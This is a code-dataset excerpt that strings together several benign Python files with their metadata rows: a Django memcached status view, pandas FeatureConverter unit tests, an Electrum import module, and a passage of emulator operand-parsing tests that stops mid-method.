| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
21308689b917b00024ac6bc365d471accdf44ba5
| 115
|
py
|
Python
|
portal/apps/memcached/views.py
|
Artis-Physis/utopia-cms
|
5cb8d941d0b2df53fddc566a52e9d3baee4a007e
|
[
"BSD-3-Clause"
] | 8
|
2020-12-15T17:11:08.000Z
|
2021-12-13T22:08:33.000Z
|
portal/apps/memcached/views.py
|
Artis-Physis/utopia-cms
|
5cb8d941d0b2df53fddc566a52e9d3baee4a007e
|
[
"BSD-3-Clause"
] | 28
|
2020-12-15T17:34:03.000Z
|
2022-02-01T04:09:10.000Z
|
portal/apps/memcached/views.py
|
Artis-Physis/utopia-cms
|
5cb8d941d0b2df53fddc566a52e9d3baee4a007e
|
[
"BSD-3-Clause"
] | 7
|
2020-12-15T19:59:17.000Z
|
2021-11-24T16:47:06.000Z
|
# -*- coding: utf-8 -*-
from memcached_status import view
def memcached_status(request):
    """Render the memcached status page by delegating to the third-party
    ``memcached_status.view`` (imported at module top)."""
    return view(request)
| 19.166667
| 33
| 0.721739
| 15
| 115
| 5.4
| 0.733333
| 0.37037
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.010309
| 0.156522
| 115
| 5
| 34
| 23
| 0.824742
| 0.182609
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0.333333
| 0.333333
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 0
|
0
| 7
|
2133e069ca87fe3a4720d2db5fafd837b8a54846
| 7,512
|
py
|
Python
|
dstools/tests/preprocessing/test_FeatureConverter.py
|
Diadochokinetic/DataScienceTools
|
a5701888eeeab8fadab17266e9b3bb7a6b6b7b0a
|
[
"MIT"
] | null | null | null |
dstools/tests/preprocessing/test_FeatureConverter.py
|
Diadochokinetic/DataScienceTools
|
a5701888eeeab8fadab17266e9b3bb7a6b6b7b0a
|
[
"MIT"
] | 3
|
2019-11-14T09:10:43.000Z
|
2019-11-25T13:16:08.000Z
|
dstools/tests/preprocessing/test_FeatureConverter.py
|
Diadochokinetic/DataScienceTools
|
a5701888eeeab8fadab17266e9b3bb7a6b6b7b0a
|
[
"MIT"
] | null | null | null |
import pandas as pd
import numpy as np
import unittest
from dstools.preprocessing.FeatureConverter import FeatureConverter
class TestFeatureConverter(unittest.TestCase):
    """Unit tests for dstools.preprocessing.FeatureConverter.

    Exercises the converter's four features: column type conversion,
    value replacement, value-flag creation and column dropping.
    """

    def _assert_column_equal(self, df_result, df_expected, column):
        """Assert *column* holds identical values in both frames.

        The explicit length check keeps a too-short result from passing
        vacuously through zip().
        """
        self.assertEqual(len(df_result[column]), len(df_expected[column]))
        for actual, expected in zip(df_result[column], df_expected[column]):
            self.assertEqual(actual, expected)

    # === type conversion ===

    def test_int_to_string(self):
        """int values should be converted to string"""
        df = pd.DataFrame({'int': [1, 2, 3, 4]})
        df_expected = pd.DataFrame({'int': ['1', '2', '3', '4']})
        df_result = FeatureConverter(columns_to_string='int').fit_transform(df)
        self._assert_column_equal(df_result, df_expected, 'int')

    def test_float_to_string(self):
        """float values should be converted to string"""
        # (docstring fixed: previously said "int values" -- copy-paste error)
        df = pd.DataFrame({'float': [1.2, 2.2, 3.2, 4.2]})
        df_expected = pd.DataFrame({'float': ['1.2', '2.2', '3.2', '4.2']})
        df_result = FeatureConverter(columns_to_string='float').fit_transform(df)
        self._assert_column_equal(df_result, df_expected, 'float')

    def test_string_to_int(self):
        """string values should be converted to int"""
        df = pd.DataFrame({'string': ['1', '2', '3', '4']})
        df_expected = pd.DataFrame({'string': [1, 2, 3, 4]})
        df_result = FeatureConverter(columns_to_int='string').fit_transform(df)
        self._assert_column_equal(df_result, df_expected, 'string')

    def test_float_to_int(self):
        """float values should be converted (rounded) to int"""
        df = pd.DataFrame({'float': [1.2, 2.2, 2.9, 4.3]})
        df_expected = pd.DataFrame({'float': [1, 2, 3, 4]})
        df_result = FeatureConverter(columns_to_int='float').fit_transform(df)
        self._assert_column_equal(df_result, df_expected, 'float')

    def test_string_to_float(self):
        """string values should be converted to float"""
        df = pd.DataFrame({'string': ['1.2', '2.2', '3.2', '4.2']})
        df_expected = pd.DataFrame({'string': [1.2, 2.2, 3.2, 4.2]})
        df_result = FeatureConverter(columns_to_float='string').fit_transform(df)
        self._assert_column_equal(df_result, df_expected, 'string')

    def test_int_to_float(self):
        """int values should be converted to float"""
        df = pd.DataFrame({'int': [1, 2, 3, 4]})
        df_expected = pd.DataFrame({'int': [1.0, 2.0, 3.0, 4.0]})
        df_result = FeatureConverter(columns_to_float='int').fit_transform(df)
        self._assert_column_equal(df_result, df_expected, 'int')

    # === replacement ===

    def test_replace_one_value(self):
        """single value should be replaced"""
        df = pd.DataFrame({'int': [1, 2, 3, 4]})
        df_expected = pd.DataFrame({'int': [42, 2, 3, 4]})
        df_result = FeatureConverter(columns_with_replace={'int': {1: 42}}).fit_transform(df)
        self._assert_column_equal(df_result, df_expected, 'int')

    def test_replace_two_values(self):
        """two values should be replaced"""
        df = pd.DataFrame({'string': ['1', '2', '3', '4']})
        df_expected = pd.DataFrame({'string': ['hello', 'world', '3', '4']})
        df_result = FeatureConverter(columns_with_replace={'string': {'1': 'hello', '2': 'world'}}).fit_transform(df)
        self._assert_column_equal(df_result, df_expected, 'string')

    def test_replace_two_columns(self):
        """values in multiple columns should be replaced"""
        df = pd.DataFrame({'int': [1, 2, 3, 4], 'string': ['1', '2', '3', '4']})
        df_expected = pd.DataFrame({'int': [42, 2, 3, 4], 'string': ['hello', 'world', '3', '4']})
        df_result = FeatureConverter(
            columns_with_replace={'int': {1: 42}, 'string': {'1': 'hello', '2': 'world'}}
        ).fit_transform(df)
        self._assert_column_equal(df_result, df_expected, 'string')
        self._assert_column_equal(df_result, df_expected, 'int')

    # === create flags ===

    def test_one_flag(self):
        """one flag should be created"""
        df = pd.DataFrame({'int': [1, 2, 3, 4]})
        df_expected = pd.DataFrame({'int': [1, 2, 3, 4], 'int_1': [1, 0, 0, 0]})
        df_result = FeatureConverter(value_flags={'int': [1]}).fit_transform(df)
        self._assert_column_equal(df_result, df_expected, 'int_1')

    def test_two_flags(self):
        """two flags should be created"""
        df = pd.DataFrame({'int': [1, 2, 3, 4]})
        df_expected = pd.DataFrame({'int': [1, 2, 3, 4], 'int_1': [1, 0, 0, 0], 'int_2': [0, 1, 0, 0]})
        df_result = FeatureConverter(value_flags={'int': [1, 2]}).fit_transform(df)
        self._assert_column_equal(df_result, df_expected, 'int_1')
        self._assert_column_equal(df_result, df_expected, 'int_2')

    def test_multiple_flags(self):
        """multiple flags should be created"""
        df = pd.DataFrame({'int': [1, 2, 3, 4], 'string': ['1', '2', '3', '4']})
        df_expected = pd.DataFrame({
            'int': [1, 2, 3, 4],
            'string': ['1', '2', '3', '4'],
            'int_1': [1, 0, 0, 0],
            'int_2': [0, 1, 0, 0],
            'string_1': [1, 0, 0, 0],
        })
        df_result = FeatureConverter(value_flags={'int': [1, 2], 'string': ['1']}).fit_transform(df)
        self._assert_column_equal(df_result, df_expected, 'int_1')
        self._assert_column_equal(df_result, df_expected, 'int_2')
        self._assert_column_equal(df_result, df_expected, 'string_1')

    # === drop column ===

    def test_drop_one(self):
        """one column should be dropped"""
        df = pd.DataFrame({'string1': ['1', '2', '3', '4'], 'string2': ['1', '2', '3', '4'], 'int': [1, 2, 3, 4]})
        df_expected = pd.DataFrame({'string2': ['1', '2', '3', '4'], 'int': [1, 2, 3, 4]})
        df_result = FeatureConverter(columns_to_drop='string1').fit_transform(df)
        # assertListEqual replaces the previous assertAlmostEqual, which
        # raises TypeError (not a clean failure) on unequal strings; it also
        # compares full column lists, so a missing trailing column is caught
        # instead of being hidden by zip().
        self.assertListEqual(list(df_result.columns), list(df_expected.columns))

    def test_drop_two(self):
        """two columns should be dropped"""
        df = pd.DataFrame({'string1': ['1', '2', '3', '4'], 'string2': ['1', '2', '3', '4'], 'int': [1, 2, 3, 4]})
        df_expected = pd.DataFrame({'string2': ['1', '2', '3', '4']})
        df_result = FeatureConverter(columns_to_drop=['string1', 'int']).fit_transform(df)
        self.assertListEqual(list(df_result.columns), list(df_expected.columns))
if __name__ == '__main__':
    # Allow running this test module directly: python test_FeatureConverter.py
    unittest.main()
| 36.643902
| 150
| 0.578674
| 1,010
| 7,512
| 4.107921
| 0.070297
| 0.20053
| 0.154254
| 0.02603
| 0.875633
| 0.871294
| 0.849602
| 0.843095
| 0.82309
| 0.791516
| 0
| 0.040198
| 0.21845
| 7,512
| 205
| 151
| 36.643902
| 0.666496
| 0.076145
| 0
| 0.464646
| 0
| 0
| 0.090021
| 0
| 0
| 0
| 0
| 0
| 0.181818
| 1
| 0.141414
| false
| 0
| 0.040404
| 0
| 0.191919
| 0
| 0
| 0
| 0
| null | 1
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
214dadec662fb38acdc0deacef6867d63bff248c
| 153
|
py
|
Python
|
electrum_gui/common/provider/chains/bch/__init__.py
|
BixinKey/electrum
|
f5de4e74e313b9b569f13ba6ab9142a38bf095f2
|
[
"MIT"
] | 12
|
2020-11-12T08:53:05.000Z
|
2021-07-06T17:30:39.000Z
|
electrum_gui/common/provider/chains/bch/__init__.py
|
BixinKey/electrum
|
f5de4e74e313b9b569f13ba6ab9142a38bf095f2
|
[
"MIT"
] | 209
|
2020-09-23T06:58:18.000Z
|
2021-11-18T11:25:41.000Z
|
electrum_gui/common/provider/chains/bch/__init__.py
|
taimanhui/electrum
|
f5de4e74e313b9b569f13ba6ab9142a38bf095f2
|
[
"MIT"
] | 19
|
2020-10-13T11:42:26.000Z
|
2022-02-06T01:26:34.000Z
|
from electrum_gui.common.provider.chains.bch.provider import BCHProvider
from electrum_gui.common.provider.chains.btc.clients.blockbook import BlockBook
| 51
| 79
| 0.875817
| 21
| 153
| 6.285714
| 0.571429
| 0.181818
| 0.227273
| 0.318182
| 0.530303
| 0.530303
| 0
| 0
| 0
| 0
| 0
| 0
| 0.052288
| 153
| 2
| 80
| 76.5
| 0.910345
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
216485c38366b8711003ea1f47b4b3d0d3777fa3
| 25,526
|
py
|
Python
|
tests/test_operands.py
|
cu2/aldebaran
|
affd692bd568cdb5a3a1840c6bc02b5197da1064
|
[
"MIT"
] | 4
|
2018-11-20T07:31:48.000Z
|
2020-12-29T22:04:03.000Z
|
tests/test_operands.py
|
cu2/aldebaran
|
affd692bd568cdb5a3a1840c6bc02b5197da1064
|
[
"MIT"
] | 7
|
2020-09-04T22:49:12.000Z
|
2022-02-26T11:19:39.000Z
|
tests/test_operands.py
|
cu2/aldebaran
|
affd692bd568cdb5a3a1840c6bc02b5197da1064
|
[
"MIT"
] | null | null | null |
import unittest
from unittest.mock import Mock
from instructions.operands import (
Operand, OpLen, OpType,
get_operand_opcode, parse_operand_buffer,
get_operand_value, set_operand_value,
_get_reference_address, _get_opbyte,
_get_register_code_by_name, _get_register_name_by_code,
InvalidRegisterNameError, InvalidRegisterCodeError,
InvalidTokenError,
InvalidOperandError, InvalidWriteOperationError, InsufficientOperandBufferError,
)
from assembler.tokenizer import Token, Reference, TokenType
from utils.utils import WordOutOfRangeError, ByteOutOfRangeError
class TestGetOperandOpcode(unittest.TestCase):
    """Tests for get_operand_opcode(): assembler Token -> operand opcode bytes.

    Each expected opcode is an opbyte (packed length/type/register, built
    with _get_opbyte) followed by the operand's value bytes.
    """
    def test_literal(self):
        """Word/byte/address literals encode to opbyte + value bytes;
        out-of-range values raise the matching *OutOfRangeError."""
        self.assertListEqual(get_operand_opcode(Token(TokenType.WORD_LITERAL, 65535, 0)), [
            _get_opbyte(OpLen.WORD, OpType.VALUE),
            0xFF, 0xFF,
        ])
        with self.assertRaises(WordOutOfRangeError):
            get_operand_opcode(Token(TokenType.WORD_LITERAL, 65536, 0))
        self.assertListEqual(get_operand_opcode(Token(TokenType.BYTE_LITERAL, 255, 0)), [
            _get_opbyte(OpLen.BYTE, OpType.VALUE),
            0xFF,
        ])
        with self.assertRaises(ByteOutOfRangeError):
            get_operand_opcode(Token(TokenType.BYTE_LITERAL, -1, 0))
        # -1 as an address word encodes as 0xFF 0xFF (two's complement).
        self.assertListEqual(get_operand_opcode(Token(TokenType.ADDRESS_WORD_LITERAL, -1, 0)), [
            _get_opbyte(OpLen.WORD, OpType.ADDRESS),
            0xFF, 0xFF,
        ])
        with self.assertRaises(WordOutOfRangeError):
            get_operand_opcode(Token(TokenType.ADDRESS_WORD_LITERAL, 35000, 0))
    def test_register(self):
        """Register operands encode entirely in the opbyte (no value bytes);
        unknown register names raise."""
        self.assertListEqual(get_operand_opcode(Token(TokenType.WORD_REGISTER, 'AX', 0)), [
            _get_opbyte(OpLen.WORD, OpType.REGISTER, 'AX'),
        ])
        self.assertListEqual(get_operand_opcode(Token(TokenType.BYTE_REGISTER, 'AL', 0)), [
            _get_opbyte(OpLen.BYTE, OpType.REGISTER, 'AL'),
        ])
        self.assertListEqual(get_operand_opcode(Token(TokenType.BYTE_REGISTER, 'AH', 0)), [
            _get_opbyte(OpLen.BYTE, OpType.REGISTER, 'AH'),
        ])
        with self.assertRaises(InvalidRegisterNameError):
            get_operand_opcode(Token(TokenType.WORD_REGISTER, 'XX', 0))
    def test_abs_ref(self):
        """Absolute register references: opbyte carries the register, one
        trailing byte carries the offset (must fit in a byte)."""
        self.assertListEqual(get_operand_opcode(Token(TokenType.ABS_REF_REG, Reference('BX', 0, 'B'), 0)), [
            _get_opbyte(OpLen.BYTE, OpType.ABS_REF_REG, 'BX'),
            0x00,
        ])
        self.assertListEqual(get_operand_opcode(Token(TokenType.ABS_REF_REG, Reference('BX', 1, 'B'), 0)), [
            _get_opbyte(OpLen.BYTE, OpType.ABS_REF_REG, 'BX'),
            0x01,
        ])
        self.assertListEqual(get_operand_opcode(Token(TokenType.ABS_REF_REG, Reference('BX', -1, 'W'), 0)), [
            _get_opbyte(OpLen.WORD, OpType.ABS_REF_REG, 'BX'),
            0xFF,
        ])
        with self.assertRaises(InvalidRegisterNameError):
            get_operand_opcode(Token(TokenType.ABS_REF_REG, Reference('XX', 0, 'W'), 0))
        with self.assertRaises(ByteOutOfRangeError):
            get_operand_opcode(Token(TokenType.ABS_REF_REG, Reference('BX', 150, 'W'), 0))
    def test_rel_ref(self):
        """Relative references: word base (2 bytes), plus an optional byte
        offset or register depending on the reference form."""
        self.assertListEqual(get_operand_opcode(Token(TokenType.REL_REF_WORD, Reference(-1, 0, 'B'), 0)), [
            _get_opbyte(OpLen.BYTE, OpType.REL_REF_WORD),
            0xFF, 0xFF,
        ])
        with self.assertRaises(WordOutOfRangeError):
            get_operand_opcode(Token(TokenType.REL_REF_WORD, Reference(35000, 0, 'B'), 0))
        with self.assertRaises(WordOutOfRangeError):
            get_operand_opcode(Token(TokenType.REL_REF_WORD, Reference(-35000, 0, 'B'), 0))
        self.assertListEqual(get_operand_opcode(Token(TokenType.REL_REF_WORD_BYTE, Reference(-1, 255, 'B'), 0)), [
            _get_opbyte(OpLen.BYTE, OpType.REL_REF_WORD_BYTE),
            0xFF, 0xFF, 0xFF,
        ])
        self.assertListEqual(get_operand_opcode(Token(TokenType.REL_REF_WORD_REG, Reference(-1, 'BX', 'B'), 0)), [
            _get_opbyte(OpLen.BYTE, OpType.REL_REF_WORD_REG, 'BX'),
            0xFF, 0xFF,
        ])
        with self.assertRaises(InvalidRegisterNameError):
            get_operand_opcode(Token(TokenType.REL_REF_WORD_REG, Reference(12000, 'XX', 'B'), 0))
    def test_other(self):
        """Tokens that are not operands (strings, unknown types) raise
        InvalidTokenError."""
        with self.assertRaises(InvalidTokenError):
            get_operand_opcode(Token(TokenType.STRING_LITERAL, 0, 0))
        with self.assertRaises(InvalidTokenError):
            get_operand_opcode(Token('unknown', 0, 0))
class TestParseOperandBuffer(unittest.TestCase):
    def test_value(self):
        """VALUE operands: a word consumes 2 buffer bytes, a byte consumes 1;
        opcode_length is the operand bytes consumed plus the instruction
        byte count passed as the second argument (1 here)."""
        operands, operand_buffer_indices, opcode_length = parse_operand_buffer([
            _get_opbyte(OpLen.WORD, OpType.VALUE),
            0xFF, 0xFF, 0xFF, 0xFF,
        ], 1)
        self.assertEqual(len(operands), 1)
        self.assertEqual(operands[0].oplen, OpLen.WORD)
        self.assertEqual(operands[0].optype, OpType.VALUE)
        self.assertIsNone(operands[0].opreg)
        self.assertEqual(operands[0].opvalue, 65535)
        self.assertIsNone(operands[0].opbase)
        self.assertIsNone(operands[0].opoffset)
        self.assertListEqual(operand_buffer_indices, [3])
        self.assertEqual(opcode_length, 4)
        operands, operand_buffer_indices, opcode_length = parse_operand_buffer([
            _get_opbyte(OpLen.BYTE, OpType.VALUE),
            0xFF, 0xFF, 0xFF, 0xFF,
        ], 1)
        self.assertEqual(len(operands), 1)
        self.assertEqual(operands[0].oplen, OpLen.BYTE)
        self.assertEqual(operands[0].optype, OpType.VALUE)
        self.assertIsNone(operands[0].opreg)
        self.assertEqual(operands[0].opvalue, 255)
        self.assertIsNone(operands[0].opbase)
        self.assertIsNone(operands[0].opoffset)
        self.assertListEqual(operand_buffer_indices, [2])
        self.assertEqual(opcode_length, 3)
    def test_address(self):
        """ADDRESS operands are word-sized and decode as signed
        (0xFFFF -> -1); a byte-sized ADDRESS is rejected."""
        operands, operand_buffer_indices, opcode_length = parse_operand_buffer([
            _get_opbyte(OpLen.WORD, OpType.ADDRESS),
            0xFF, 0xFF, 0xFF, 0xFF,
        ], 1)
        self.assertEqual(len(operands), 1)
        self.assertEqual(operands[0].oplen, OpLen.WORD)
        self.assertEqual(operands[0].optype, OpType.ADDRESS)
        self.assertIsNone(operands[0].opreg)
        self.assertEqual(operands[0].opvalue, -1)
        self.assertIsNone(operands[0].opbase)
        self.assertIsNone(operands[0].opoffset)
        self.assertListEqual(operand_buffer_indices, [3])
        self.assertEqual(opcode_length, 4)
        with self.assertRaises(InvalidOperandError):
            parse_operand_buffer([
                _get_opbyte(OpLen.BYTE, OpType.ADDRESS),
                0xFF, 0xFF, 0xFF, 0xFF,
            ], 1)
def test_register(self):
operands, operand_buffer_indices, opcode_length = parse_operand_buffer([
_get_opbyte(OpLen.WORD, OpType.REGISTER, 'BX'),
0xFF, 0xFF, 0xFF, 0xFF,
], 1)
self.assertEqual(len(operands), 1)
self.assertEqual(operands[0].oplen, OpLen.WORD)
self.assertEqual(operands[0].optype, OpType.REGISTER)
self.assertEqual(operands[0].opreg, 'BX')
self.assertIsNone(operands[0].opvalue)
self.assertIsNone(operands[0].opbase)
self.assertIsNone(operands[0].opoffset)
self.assertListEqual(operand_buffer_indices, [1])
self.assertEqual(opcode_length, 2)
operands, operand_buffer_indices, opcode_length = parse_operand_buffer([
_get_opbyte(OpLen.BYTE, OpType.REGISTER, 'AH'),
0xFF, 0xFF, 0xFF, 0xFF,
], 1)
self.assertEqual(len(operands), 1)
self.assertEqual(operands[0].oplen, OpLen.BYTE)
self.assertEqual(operands[0].optype, OpType.REGISTER)
self.assertEqual(operands[0].opreg, 'AH')
self.assertIsNone(operands[0].opvalue)
self.assertIsNone(operands[0].opbase)
self.assertIsNone(operands[0].opoffset)
self.assertListEqual(operand_buffer_indices, [1])
self.assertEqual(opcode_length, 2)
with self.assertRaises(InvalidRegisterCodeError):
parse_operand_buffer([
_get_opbyte(OpLen.BYTE, OpType.REGISTER, 'BX'),
0xFF, 0xFF, 0xFF, 0xFF,
], 1)
with self.assertRaises(InvalidRegisterNameError):
parse_operand_buffer([
_get_opbyte(OpLen.WORD, OpType.REGISTER, 'XX'),
0xFF, 0xFF, 0xFF, 0xFF,
], 1)
def test_abs_ref(self):
operands, operand_buffer_indices, opcode_length = parse_operand_buffer([
_get_opbyte(OpLen.WORD, OpType.ABS_REF_REG, 'BX'),
0xFF, 0xFF, 0xFF, 0xFF,
], 1)
self.assertEqual(len(operands), 1)
self.assertEqual(operands[0].oplen, OpLen.WORD)
self.assertEqual(operands[0].optype, OpType.ABS_REF_REG)
self.assertEqual(operands[0].opreg, 'BX')
self.assertIsNone(operands[0].opvalue)
self.assertIsNone(operands[0].opbase)
self.assertEqual(operands[0].opoffset, -1)
self.assertListEqual(operand_buffer_indices, [2])
self.assertEqual(opcode_length, 3)
with self.assertRaises(InvalidRegisterCodeError):
parse_operand_buffer([
_get_opbyte(OpLen.WORD, OpType.ABS_REF_REG, 'AH'),
0xFF, 0xFF, 0xFF, 0xFF,
], 1)
def test_rel_ref(self):
operands, operand_buffer_indices, opcode_length = parse_operand_buffer([
_get_opbyte(OpLen.WORD, OpType.REL_REF_WORD),
0xFF, 0xFF, 0xFF, 0xFF,
], 1)
self.assertEqual(len(operands), 1)
self.assertEqual(operands[0].oplen, OpLen.WORD)
self.assertEqual(operands[0].optype, OpType.REL_REF_WORD)
self.assertIsNone(operands[0].opreg)
self.assertIsNone(operands[0].opvalue)
self.assertEqual(operands[0].opbase, -1)
self.assertIsNone(operands[0].opoffset)
self.assertListEqual(operand_buffer_indices, [3])
self.assertEqual(opcode_length, 4)
operands, operand_buffer_indices, opcode_length = parse_operand_buffer([
_get_opbyte(OpLen.WORD, OpType.REL_REF_WORD_BYTE),
0xFF, 0xFF, 0xFF, 0xFF,
], 1)
self.assertEqual(len(operands), 1)
self.assertEqual(operands[0].oplen, OpLen.WORD)
self.assertEqual(operands[0].optype, OpType.REL_REF_WORD_BYTE)
self.assertIsNone(operands[0].opreg)
self.assertIsNone(operands[0].opvalue)
self.assertEqual(operands[0].opbase, -1)
self.assertEqual(operands[0].opoffset, 255)
self.assertListEqual(operand_buffer_indices, [4])
self.assertEqual(opcode_length, 5)
operands, operand_buffer_indices, opcode_length = parse_operand_buffer([
_get_opbyte(OpLen.WORD, OpType.REL_REF_WORD_REG, 'BX'),
0xFF, 0xFF, 0xFF, 0xFF,
], 1)
self.assertEqual(len(operands), 1)
self.assertEqual(operands[0].oplen, OpLen.WORD)
self.assertEqual(operands[0].optype, OpType.REL_REF_WORD_REG)
self.assertEqual(operands[0].opreg, 'BX')
self.assertIsNone(operands[0].opvalue)
self.assertEqual(operands[0].opbase, -1)
self.assertIsNone(operands[0].opoffset)
self.assertListEqual(operand_buffer_indices, [3])
self.assertEqual(opcode_length, 4)
def test_multiple_operands(self):
operands, operand_buffer_indices, opcode_length = parse_operand_buffer([
_get_opbyte(OpLen.WORD, OpType.REGISTER, 'BX'),
_get_opbyte(OpLen.WORD, OpType.VALUE),
0xFF, 0xFF, 0xFF, 0xFF,
], 2)
self.assertEqual(len(operands), 2)
self.assertEqual(operands[0].oplen, OpLen.WORD)
self.assertEqual(operands[0].optype, OpType.REGISTER)
self.assertEqual(operands[0].opreg, 'BX')
self.assertIsNone(operands[0].opvalue)
self.assertIsNone(operands[0].opbase)
self.assertIsNone(operands[0].opoffset)
self.assertEqual(operands[1].oplen, OpLen.WORD)
self.assertEqual(operands[1].optype, OpType.VALUE)
self.assertIsNone(operands[1].opreg)
self.assertEqual(operands[1].opvalue, 65535)
self.assertIsNone(operands[1].opbase)
self.assertIsNone(operands[1].opoffset)
self.assertListEqual(operand_buffer_indices, [1, 4])
self.assertEqual(opcode_length, 5)
def test_not_enough_buffer(self):
with self.assertRaises(InsufficientOperandBufferError):
parse_operand_buffer([
_get_opbyte(OpLen.WORD, OpType.VALUE),
0xFF,
], 1)
class TestGetOperandValue(unittest.TestCase):
    """Tests for get_operand_value() using mocked CPU registers and RAM."""

    def setUp(self):
        self.cpu = Mock()
        self.ram = Mock()
        # Every register read yields 0xA0B0; RAM reads yield fixed byte/word values.
        self.cpu.registers.get_register.return_value = 0xA0B0
        self.ram.read_byte = Mock(return_value=0xCC)
        self.ram.read_word = Mock(return_value=0xCCDD)

    def _get(self, operand):
        """Evaluate *operand* at instruction pointer 0x1234."""
        return get_operand_value(operand, self.cpu, self.ram, 0x1234)

    def _assert_access(self, reg=None, byte_addr=None, word_addr=None):
        """Check which mocked accessors were hit (exactly once) and with what argument."""
        get_register = self.cpu.registers.get_register
        if reg is None:
            self.assertEqual(get_register.call_count, 0)
        else:
            self.assertEqual(get_register.call_count, 1)
            self.assertEqual(get_register.call_args_list[0][0][0], reg)
        if byte_addr is None:
            self.assertEqual(self.ram.read_byte.call_count, 0)
        else:
            self.assertEqual(self.ram.read_byte.call_count, 1)
            self.assertEqual(self.ram.read_byte.call_args_list[0][0][0], byte_addr)
        if word_addr is None:
            self.assertEqual(self.ram.read_word.call_count, 0)
        else:
            self.assertEqual(self.ram.read_word.call_count, 1)
            self.assertEqual(self.ram.read_word.call_args_list[0][0][0], word_addr)

    def test_value(self):
        # Immediate values come straight from the operand; no CPU/RAM access.
        self.assertEqual(self._get(Operand(OpLen.BYTE, OpType.VALUE, None, 255, None, None)), 255)
        self.assertEqual(self._get(Operand(OpLen.WORD, OpType.VALUE, None, 65535, None, None)), 65535)
        self._assert_access()

    def test_address(self):
        # ADDRESS operands are offsets relative to the instruction pointer.
        self.assertEqual(self._get(Operand(OpLen.WORD, OpType.ADDRESS, None, 1, None, None)), 0x1235)
        self.assertEqual(self._get(Operand(OpLen.WORD, OpType.ADDRESS, None, -1, None, None)), 0x1233)
        self._assert_access()

    def test_register(self):
        self.assertEqual(self._get(Operand(OpLen.WORD, OpType.REGISTER, 'AX', 1, None, None)), 0xA0B0)
        self._assert_access(reg='AX')

    def test_abs_ref_reg_b(self):
        # Byte read at register value + offset: 0xA0B0 + 0x01.
        self.assertEqual(self._get(Operand(OpLen.BYTE, OpType.ABS_REF_REG, 'AX', None, None, 0x01)), 0xCC)
        self._assert_access(reg='AX', byte_addr=0xA0B1)

    def test_abs_ref_reg_w(self):
        self.assertEqual(self._get(Operand(OpLen.WORD, OpType.ABS_REF_REG, 'AX', None, None, 0x01)), 0xCCDD)
        self._assert_access(reg='AX', word_addr=0xA0B1)

    def test_rel_ref_word(self):
        # IP-relative read: 0x1234 - 0x1111 = 0x0123.
        self.assertEqual(self._get(Operand(OpLen.BYTE, OpType.REL_REF_WORD, None, None, -0x1111, None)), 0xCC)
        self._assert_access(byte_addr=0x0123)

    def test_rel_ref_word_byte(self):
        # IP-relative with extra byte offset: 0x0123 + 0x22 = 0x0145.
        self.assertEqual(self._get(Operand(OpLen.BYTE, OpType.REL_REF_WORD_BYTE, None, None, -0x1111, 0x22)), 0xCC)
        self._assert_access(byte_addr=0x0145)

    def test_rel_ref_word_reg(self):
        # IP-relative plus register value: 0x0123 + 0xA0B0 = 0xA1D3.
        self.assertEqual(self._get(Operand(OpLen.BYTE, OpType.REL_REF_WORD_REG, 'AX', None, -0x1111, None)), 0xCC)
        self._assert_access(reg='AX', byte_addr=0xA1D3)
class TestSetOperandValue(unittest.TestCase):
    """Tests for set_operand_value() using mocked CPU registers and RAM."""

    def setUp(self):
        self.cpu = Mock()
        self.ram = Mock()
        # Register reads always yield 0xA0B0; all write targets are plain mocks.
        self.cpu.registers.get_register.return_value = 0xA0B0
        self.cpu.registers.set_register = Mock()
        self.ram.write_byte = Mock()
        self.ram.write_word = Mock()

    def _set(self, operand, value):
        """Write *value* through *operand* at instruction pointer 0x1234."""
        set_operand_value(operand, value, self.cpu, self.ram, 0x1234)

    def _assert_access(self, reg_read=None, byte_write=None, word_write=None):
        """Check register reads and RAM writes; *_write args are (address, value)."""
        get_register = self.cpu.registers.get_register
        if reg_read is None:
            self.assertEqual(get_register.call_count, 0)
        else:
            self.assertEqual(get_register.call_count, 1)
            self.assertEqual(get_register.call_args_list[0][0][0], reg_read)
        if byte_write is None:
            self.assertEqual(self.ram.write_byte.call_count, 0)
        else:
            self.assertEqual(self.ram.write_byte.call_count, 1)
            self.assertEqual(self.ram.write_byte.call_args_list[0][0][0], byte_write[0])
            self.assertEqual(self.ram.write_byte.call_args_list[0][0][1], byte_write[1])
        if word_write is None:
            self.assertEqual(self.ram.write_word.call_count, 0)
        else:
            self.assertEqual(self.ram.write_word.call_count, 1)
            self.assertEqual(self.ram.write_word.call_args_list[0][0][0], word_write[0])
            self.assertEqual(self.ram.write_word.call_args_list[0][0][1], word_write[1])

    def test_readonly(self):
        # VALUE and ADDRESS operands cannot be written.
        for operand, value in (
            (Operand(OpLen.BYTE, OpType.VALUE, None, 255, None, None), 0x44),
            (Operand(OpLen.WORD, OpType.ADDRESS, None, -1, None, None), 0x3344),
        ):
            with self.assertRaises(InvalidWriteOperationError):
                self._set(operand, value)

    def test_register(self):
